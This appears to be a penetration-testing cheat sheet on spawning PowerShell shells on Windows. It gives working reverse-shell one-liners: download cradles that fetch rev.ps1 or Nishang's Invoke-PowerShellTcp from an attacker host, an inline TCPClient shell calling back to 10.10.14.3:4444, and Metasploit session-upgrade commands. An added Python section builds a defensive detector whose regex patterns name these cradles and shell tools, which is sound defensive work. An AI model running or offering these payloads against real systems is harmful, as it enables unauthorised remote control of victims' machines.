Operator On The Wire

Windows

1. Manual PowerShell Spawn

If you have a working cmd.exe shell:

powershell -nop -exec bypass

That drops you into an interactive PowerShell prompt.


2. One-Liner PowerShell Reverse Shell (Stageless)

From a cmd shell, run:

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/rev.ps1')"

  • Host a reverse shell script (rev.ps1) on your attacker box.

  • On Kali:

    python3 -m http.server 80
    nc -lvnp 4444

  • The PowerShell payload will connect back.


3. PowerShell Reverse Shell Inline One-Liner

Classic Nishang-style:

powershell -nop -exec bypass -c "$client=New-Object System.Net.Sockets.TCPClient('10.10.14.3',4444);$s=$client.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+'PS '+(pwd).Path+'> ';$sbt=[text.encoding]::ASCII.GetBytes($sb2);$s.Write($sbt,0,$sbt.Length)}"

Replace 10.10.14.3 and 4444 with your attacker IP/port.


4. Metasploit Upgrade

If you caught the initial cmd shell in Metasploit:

sessions -u <id>

That will attempt to upgrade the shell into a Meterpreter session.
From there you can spawn PowerShell with:

load powershell
powershell_shell


5. Use Invoke-PowerShellTcp.ps1 from Nishang

On your attacker box:

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Host it with Python, then on the target:

powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4444"
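Every launcher in sections 2, 3 and 5 leaves the same fingerprints in process-creation telemetry: -nop, -w hidden, -exec bypass, an IEX/DownloadString cradle, Net.Sockets.TCPClient or Invoke-PowerShellTcp on the command line. The following is an added detection example, not part of the original page, that scores Sysmon Event ID 1 style records (field names Image, ParentImage, CommandLine are real; the weights, threshold and sample events are constructed assumptions).

```python
import re

# Indicators taken from the one-liners on this page. PowerShell accepts any
# unambiguous prefix of a parameter name, so each pattern covers the short and
# the long spelling (-nop / -NoProfile, -w hidden / -WindowStyle Hidden, ...).
# Weights (assumed) reflect how often a flag appears in legitimate admin use:
# -nop and -ExecutionPolicy Bypass alone are weak, a download cradle is not.
INDICATORS = [
    ("no_profile",      1, re.compile(r"(?<!\w)-nop(rofile)?\b", re.I)),
    ("hidden_window",   2, re.compile(r"(?<!\w)-w(in(dowstyle)?)?\s+hidden\b", re.I)),
    ("exec_bypass",     1, re.compile(r"(?<!\w)-e[xp]\w*\s+bypass\b", re.I)),
    ("download_cradle", 3, re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I)),
    ("tcp_client",      4, re.compile(r"net\.sockets\.tcpclient", re.I)),
    ("nishang_tcp",     4, re.compile(r"invoke-powershelltcp", re.I)),
]
THRESHOLD = 3  # assumed: tune against your own baseline of admin scripts

def analyze(command_line: str) -> dict:
    """Score one process command line; return matched indicators and verdict."""
    hits = [name for name, _, rx in INDICATORS if rx.search(command_line)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}

def triage(events: list) -> list:
    """Return only the PowerShell launches that cross the threshold."""
    flagged = []
    for ev in events:
        if "powershell" not in ev["Image"].lower():
            continue
        verdict = analyze(ev["CommandLine"])
        if verdict["suspicious"]:
            flagged.append({**ev, **verdict})
    return flagged

# Constructed sample events modelled on Sysmon Event ID 1 fields.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(\'http://<attacker>/rev.ps1\')"'},
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\deploy\\install.ps1"},
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Process | Sort-Object CPU"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['score']}] {hit['ParentImage']} -> {hit['hits']}")
```

Only the cmd.exe-spawned cradle is flagged; the software-deployment and interactive launches each score 1 and stay below the threshold, which is the point of weighting rather than alerting on -exec bypass alone.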